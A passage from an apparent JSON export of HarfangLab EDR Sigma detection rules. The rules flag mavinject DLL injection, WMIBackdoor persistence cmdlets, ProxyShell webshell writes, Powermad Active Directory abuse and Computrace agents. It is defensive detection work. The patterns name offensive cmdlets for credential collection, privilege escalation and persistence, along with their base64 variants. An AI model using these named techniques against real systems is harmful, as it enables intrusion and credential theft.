"https://lolbas-project.github.io/lolbas/Binaries/Mavinject/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1055/001/"
],
"name": "t1218_mavinject.yml",
"content": "title: Process Injected via MavInject\nid: 2f78ddbf-ec12-46ef-b5f4-1c5272a8acd3\ndescription: |\n Detects an attempt to open a process by mavinject.exe.\n This can be used by attackers to inject and execute an arbitrary DLL on any processes.\n It is recommended to check process' parents and the opened process for suspicious actions or content.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Mavinject/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1055/001/\ndate: 2021/06/16\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1055.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.LOLBin.Mavinject\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n GrantedAccess: '0x10143a'\n ProcessOriginalFileName:\n - 'mavinject32.exe'\n - 'mavinject64.exe'\n\n exclusion_appvisvsubsystems:\n ProcessCommandLine|contains:\n - '\\AppVIsvSubsystems32.dll'\n - '\\AppVIsvSubsystems64.dll'\n\n exclusion_appv:\n ProcessParentImage: '?:\\Windows\\System32\\AppVClient.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2f78ddbf-ec12-46ef-b5f4-1c5272a8acd3",
"rule_name": "Process Injected via MavInject",
"rule_description": "Detects an attempt to open a process by mavinject.exe.\nThis can be used by attackers to inject and execute an arbitrary DLL on any processes.\nIt is recommended to check process' parents and the opened process for suspicious actions or content.\n",
"rule_creation_date": "2021-06-16",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.001",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2f8e4b3a-9c7d-4e6f-8a1b-5d3c9e7f2a4b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624544Z",
"creation_date": "2026-03-23T11:45:34.624546Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624550Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/mattifestation/WMI_Backdoor",
"https://attack.mitre.org/techniques/T1546/003/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1546_003_wmi_backdoor_trigger_cmdlet.yml",
"content": "title: WMIBackdoor PowerShell Cmdlet Executed\nid: 2f8e4b3a-9c7d-4e6f-8a1b-5d3c9e7f2a4b\ndescription: |\n Detects the execution of the WMIBackdoor.ps1 PowerShell script used to create WMI event subscription backdoors.\n This script establishes persistent malicious WMI event consumers that trigger on specific system events, allowing attackers to maintain access and execute arbitrary code.\n WMI event subscriptions are a common persistence mechanism that can survive reboots and are often difficult to detect through standard security tools.\n It is recommended to investigate the WMI event subscriptions on the system via the associated telemetry, analyze the triggered actions and payloads, and review the process tree for the parent process that executed this cmdlet.\nreferences:\n - https://github.com/mattifestation/WMI_Backdoor\n - https://attack.mitre.org/techniques/T1546/003/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2025/11/07\nmodified: 2025/12/08\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.003\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.WMIBackdoor\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n ScriptBlockText|contains:\n - 'New-WMIBackdoorTrigger'\n - 'New-WMIBackdoorAction'\n - 'Register-WMIBackdoor'\n\n condition: selection\nlevel: high\nconfidence: strong\n\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2f8e4b3a-9c7d-4e6f-8a1b-5d3c9e7f2a4b",
"rule_name": "WMIBackdoor PowerShell Cmdlet Executed",
"rule_description": "Detects the execution of the WMIBackdoor.ps1 PowerShell script used to create WMI event subscription backdoors.\nThis script establishes persistent malicious WMI event consumers that trigger on specific system events, allowing attackers to maintain access and execute arbitrary code.\nWMI event subscriptions are a common persistence mechanism that can survive reboots and are often difficult to detect through standard security tools.\nIt is recommended to investigate the WMI event subscriptions on the system via the associated telemetry, analyze the triggered actions and payloads, and review the process tree for the parent process that executed this cmdlet.\n",
"rule_creation_date": "2025-11-07",
"rule_modified_date": "2025-12-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1546.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2f9bedc8-2825-415e-a921-7af30eb2aa12",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092287Z",
"creation_date": "2026-03-23T11:45:34.092289Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092294Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers",
"https://redcanary.com/blog/blackbyte-ransomware/",
"https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1190_proxyshell_vulnerability_exploitation.yml",
"content": "title: Microsoft Exchange Server Vulnerability Exploitation\nid: 2f9bedc8-2825-415e-a921-7af30eb2aa12\ndescription: |\n Detects a possible exploitation of CVE-2021-31207 (aka ProxyShell) related to Microsoft Exchange server, that allows an attacker to write files to the system.\n The ProxyShell vulnerabilities consist of three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) affecting on-premises Microsoft Exchange servers that allow attackers to perform a pre-authenticated remote code execution.\n It is recommended to analyze the files written to disk to look for webshells or any suspicious content.\nreferences:\n - https://www.mandiant.com/resources/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers\n - https://redcanary.com/blog/blackbyte-ransomware/\n - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2022/07/08\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.persistence\n - attack.t1505.003\n - cve.2021-31207\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.Exchange\n - classification.Windows.Exploit.ProxyShell\n - classification.Windows.Exploit.CVE-2021-34473\n - classification.Windows.Exploit.CVE-2021-34523\n - classification.Windows.Exploit.CVE-2021-31207\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image|endswith: '\\MSExchangeMailboxReplication.exe'\n Path|endswith:\n - '.aspx'\n - '.asp'\n - '.ashx'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2f9bedc8-2825-415e-a921-7af30eb2aa12",
"rule_name": "Microsoft Exchange Server Vulnerability Exploitation",
"rule_description": "Detects a possible exploitation of CVE-2021-31207 (aka ProxyShell) related to Microsoft Exchange server, that allows an attacker to write files to the system.\nThe ProxyShell vulnerabilities consist of three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) affecting on-premises Microsoft Exchange servers that allow attackers to perform a pre-authenticated remote code execution.\nIt is recommended to analyze the files written to disk to look for webshells or any suspicious content.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2fd97120-c808-466a-81ed-6aabf72403a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604632Z",
"creation_date": "2026-03-23T11:45:34.604636Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604643Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Kevin-Robertson/Powermad",
"https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/",
"https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-transitive-quota/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1557/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_powermad_cmd.yml",
"content": "title: Malicious PowerShell Powermad Commandlets in Command-line\nid: 2fd97120-c808-466a-81ed-6aabf72403a2\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Powermad framework.\n The Powermad framework is generally associated with Active Directory Internal DNS (ADIDNS) exploitation for privilege escalation and credential collection through LLMNR poisoning (along with tools such as Inveigh) and SMB Relaying.\n It is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the PowerShell host process.\nreferences:\n - https://github.com/Kevin-Robertson/Powermad\n - https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/\n - https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-transitive-quota/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1557/001/\ndate: 2022/10/12\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.credential_access\n - attack.collection\n - attack.t1557.001\n - attack.defense_evasion\n - attack.t1550.002\n - attack.persistence\n - attack.privilege_escalation\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.PowerMad\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n selection_cmdlet:\n CommandLine|contains:\n # ================================== Machine Account Quota functions ==================================\n # Return machine account attributes.\n - 'Get-MachineAccountAttribute'\n - 'RwBlAHQALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQAQQB0AHQAcgBpAGIAdQB0AGUA'\n - 'cAZQB0AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0AEEAdAB0AHIAaQBiAHUAdABlA'\n - 'HAGUAdAAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdABBAHQAdAByAGkAYgB1AHQAZQ'\n # Returns Machine Account Creator. Usually only set when the node was created by an unprivileged user.\n - 'Get-MachineAccountCreator'\n - 'RwBlAHQALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQAQwByAGUAYQB0AG8Acg'\n - 'cAZQB0AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0AEMAcgBlAGEAdABvAHIA'\n - 'HAGUAdAAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdABDAHIAZQBhAHQAbwByA'\n # Disables a machine account.\n - 'Disable-MachineAccount'\n - 'RABpAHMAYQBiAGwAZQAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n - 'QAaQBzAGEAYgBsAGUALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - 'EAGkAcwBhAGIAbABlAC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n # Enables a machine account.\n - 'Enable-MachineAccount'\n - 'RQBuAGEAYgBsAGUALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - 'UAbgBhAGIAbABlAC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n - 'FAG4AYQBiAGwAZQAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n # Creates a new machine account through an encrypted LDAP request. Can then be used with the `runas` command.\n - 'New-MachineAccount'\n - 'TgBlAHcALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - '4AZQB3AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n - 'OAGUAdwAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n # Removes a machine account with a privileged account.\n - 'Remove-MachineAccount'\n - 'UgBlAG0AbwB2AGUALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - 'IAZQBtAG8AdgBlAC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n - 'SAGUAbQBvAHYAZQAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n # Set attributes for an account that was created with Powermad.\n - 'Set-MachineAccountAttribute'\n - 'UwBlAHQALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQAQQB0AHQAcgBpAGIAdQB0AGUA'\n - 'MAZQB0AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0AEEAdAB0AHIAaQBiAHUAdABlA'\n - 'TAGUAdAAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdABBAHQAdAByAGkAYgB1AHQAZQ'\n # Recursively creates Machine Accounts, allowed due to the Transitive Machine Account Quota and updates of the ms-DS-CreatorSID attribute.\n - 'Invoke-AgentSmith'\n - 'SQBuAHYAbwBrAGUALQBBAGcAZQBuAHQAUwBtAGkAdABoA'\n - 'kAbgB2AG8AawBlAC0AQQBnAGUAbgB0AFMAbQBpAHQAaA'\n - 'JAG4AdgBvAGsAZQAtAEEAZwBlAG4AdABTAG0AaQB0AGgA'\n # ========================================= ADIDNS Functions ==========================================\n # Used to add or delete ADIDNS dynamic DNS records if secure dynamic updates are configured on a DC.\n - 'Invoke-DNSUpdate'\n - 'SQBuAHYAbwBrAGUALQBEAE4AUwBVAHAAZABhAHQAZQ'\n - 'kAbgB2AG8AawBlAC0ARABOAFMAVQBwAGQAYQB0AGUA'\n - 'JAG4AdgBvAGsAZQAtAEQATgBTAFUAcABkAGEAdABlA'\n # Tombstone an ADIDNS node.\n - 'Disable-ADIDNSNode'\n - 'RABpAHMAYQBiAGwAZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n - 'QAaQBzAGEAYgBsAGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'EAGkAcwBhAGIAbABlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n # Revive tombstoned node.\n - 'Enable-ADIDNSNode'\n - 'RQBuAGEAYgBsAGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'UAbgBhAGIAbABlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'FAG4AYQBiAGwAZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Return values that populate a node attribute.\n - 'Get-ADIDNSNodeAttribute'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAEEAdAB0AHIAaQBiAHUAdABlA'\n - 'cAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBBAHQAdAByAGkAYgB1AHQAZQ'\n - 'HAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUAQQB0AHQAcgBpAGIAdQB0AGUA'\n # Returns the owner of a node.\n - 'Get-ADIDNSNodeOwner'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAE8AdwBuAGUAcg'\n - 'cAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBPAHcAbgBlAHIA'\n - 'HAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUATwB3AG4AZQByA'\n # Gets a DACL (Discretionary Access Control List, which users/groups can access an object) of an ADIDNS node or zone.\n - 'Get-ADIDNSPermission'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBQAGUAcgBtAGkAcwBzAGkAbwBuA'\n - 'cAZQB0AC0AQQBEAEkARABOAFMAUABlAHIAbQBpAHMAcwBpAG8Abg'\n - 'HAGUAdAAtAEEARABJAEQATgBTAFAAZQByAG0AaQBzAHMAaQBvAG4A'\n # Returns ADIDNS zones.\n - 'Get-ADIDNSZone'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBaAG8AbgBlA'\n - 'cAZQB0AC0AQQBEAEkARABOAFMAWgBvAG4AZQ'\n - 'HAGUAdAAtAEEARABJAEQATgBTAFoAbwBuAGUA'\n # Adds access (ACE) to a node or zone DACL.\n - 'Grant-ADIDNSPermission'\n - 'RwByAGEAbgB0AC0AQQBEAEkARABOAFMAUABlAHIAbQBpAHMAcwBpAG8Abg'\n - 'cAcgBhAG4AdAAtAEEARABJAEQATgBTAFAAZQByAG0AaQBzAHMAaQBvAG4A'\n - 'HAHIAYQBuAHQALQBBAEQASQBEAE4AUwBQAGUAcgBtAGkAcwBzAGkAbwBuA'\n # Creates a new node thorugh an encrypted LDAP request.\n - 'New-ADIDNSNode'\n - 'TgBlAHcALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - '4AZQB3AC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'OAGUAdwAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Creates a valid byte array for the dnsRecord attribute.\n - 'New-DNSRecordArray'\n - 'TgBlAHcALQBEAE4AUwBSAGUAYwBvAHIAZABBAHIAcgBhAHkA'\n - '4AZQB3AC0ARABOAFMAUgBlAGMAbwByAGQAQQByAHIAYQB5A'\n - 'OAGUAdwAtAEQATgBTAFIAZQBjAG8AcgBkAEEAcgByAGEAeQ'\n # Gets an SOA (Start of authority) serial number for a DNS zone and increments it.\n - 'New-SOASerialNumberArray'\n - 'TgBlAHcALQBTAE8AQQBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgBBAHIAcgBhAHkA'\n - '4AZQB3AC0AUwBPAEEAUwBlAHIAaQBhAGwATgB1AG0AYgBlAHIAQQByAHIAYQB5A'\n - 'OAGUAdwAtAFMATwBBAFMAZQByAGkAYQBsAE4AdQBtAGIAZQByAEEAcgByAGEAeQ'\n # Renames a node.\n - 'Rename-ADIDNSNode'\n - 'UgBlAG4AYQBtAGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'IAZQBuAGEAbQBlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'SAGUAbgBhAG0AZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Removes a node.\n - 'Remove-ADIDNSNode'\n - 'UgBlAG0AbwB2AGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'IAZQBtAG8AdgBlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'SAGUAbQBvAHYAZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Removes an ACE from a DACL.\n - 'Revoke-ADIDNSPermission'\n - 'UgBlAHYAbwBrAGUALQBBAEQASQBEAE4AUwBQAGUAcgBtAGkAcwBzAGkAbwBuA'\n - 'IAZQB2AG8AawBlAC0AQQBEAEkARABOAFMAUABlAHIAbQBpAHMAcwBpAG8Abg'\n - 'SAGUAdgBvAGsAZQAtAEEARABJAEQATgBTAFAAZQByAG0AaQBzAHMAaQBvAG4A'\n # Appends or overwrites node attributes.\n - 'Set-ADIDNSNodeAttribute'\n - 'UwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAEEAdAB0AHIAaQBiAHUAdABlA'\n - 'MAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBBAHQAdAByAGkAYgB1AHQAZQ'\n - 'TAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUAQQB0AHQAcgBpAGIAdQB0AGUA'\n # Sets the owner of a Node, SeRestorePrivilege token required.\n - 'Set-ADIDNSNodeOwner'\n - 'UwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAE8AdwBuAGUAcg'\n - 'MAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBPAHcAbgBlAHIA'\n - 'TAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUATwB3AG4AZQByA'\n # Generating Kerberos AES-256 and 128 Keys for know username and password, this can be used as a PtH attack in InvokeDNSUPdate\n - 'Get-KerberosAESKey'\n - 'RwBlAHQALQBLAGUAcgBiAGUAcgBvAHMAQQBFAFMASwBlAHkA'\n - 'cAZQB0AC0ASwBlAHIAYgBlAHIAbwBzAEEARQBTAEsAZQB5A'\n - 'HAGUAdAAtAEsAZQByAGIAZQByAG8AcwBBAEUAUwBLAGUAeQ'\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2fd97120-c808-466a-81ed-6aabf72403a2",
"rule_name": "Malicious PowerShell Powermad Commandlets in Command-line",
"rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the Powermad framework.\nThe Powermad framework is generally associated with Active Directory Internal DNS (ADIDNS) exploitation for privilege escalation and credential collection through LLMNR poisoning (along with tools such as Inveigh) and SMB Relaying.\nIt is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the PowerShell host process.\n",
"rule_creation_date": "2022-10-12",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1550.002",
"attack.t1557.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2fe027bc-7a3c-412a-9493-8581215d5157",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606892Z",
"creation_date": "2026-03-23T11:45:34.606895Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606903Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://securelist.com/absolute-computrace-revisited/58278/",
"https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf",
"https://attack.mitre.org/techniques/T1569/002/"
],
"name": "t1569_002_computrace_rpcnetp.yml",
"content": "title: Computrace Agent Started\nid: 2fe027bc-7a3c-412a-9493-8581215d5157\ndescription: |\n Detects the execution of rpcnet.exe or rpcnetp.exe which is the Computrace Agent (Communication Driver Agent).\n Computrace (aka LoJack) is an Absolute Sotfware solution used to trace stolen laptops.\n Attackers can use Computrace a backdoor that can survive a reinstallation of the whole OS.\n It recommended to disable this rule if the IT covered by HarfangLab EDR legitimately uses Computrace as an anti-theft solution.\n If the IT does not use Computrace, it is recommended to analyze the behavior of the launched binary to look for malicious actions or network connections.\nreferences:\n - https://securelist.com/absolute-computrace-revisited/58278/\n - https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf\n - https://attack.mitre.org/techniques/T1569/002/\ndate: 2022/09/02\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.Computrace\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image:\n - '?:\\Windows\\System32\\rpcnetp.exe'\n - '?:\\Windows\\SysWOW64\\rpcnet.exe'\n ParentImage: '?:\\Windows\\System32\\services.exe'\n condition: selection\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2fe027bc-7a3c-412a-9493-8581215d5157",
"rule_name": "Computrace Agent Started",
"rule_description": "Detects the execution of rpcnet.exe or rpcnetp.exe which is the Computrace Agent (Communication Driver Agent).\nComputrace (aka LoJack) is an Absolute Sotfware solution used to trace stolen laptops.\nAttackers can use Computrace a backdoor that can survive a reinstallation of the whole OS.\nIt recommended to disable this rule if the IT covered by HarfangLab EDR legitimately uses Computrace as an anti-theft solution.\nIf the IT does not use Computrace, it is recommended to analyze the behavior of the launched binary to look for malicious actions or network connections.\n",
"rule_creation_date": "2022-09-02",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2ffd5e79-150c-4383-847e-9e74ca72179a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599622Z",
"creation_date": "2026-03-23T11:45:34.599625Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599633Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ldifd.yml",
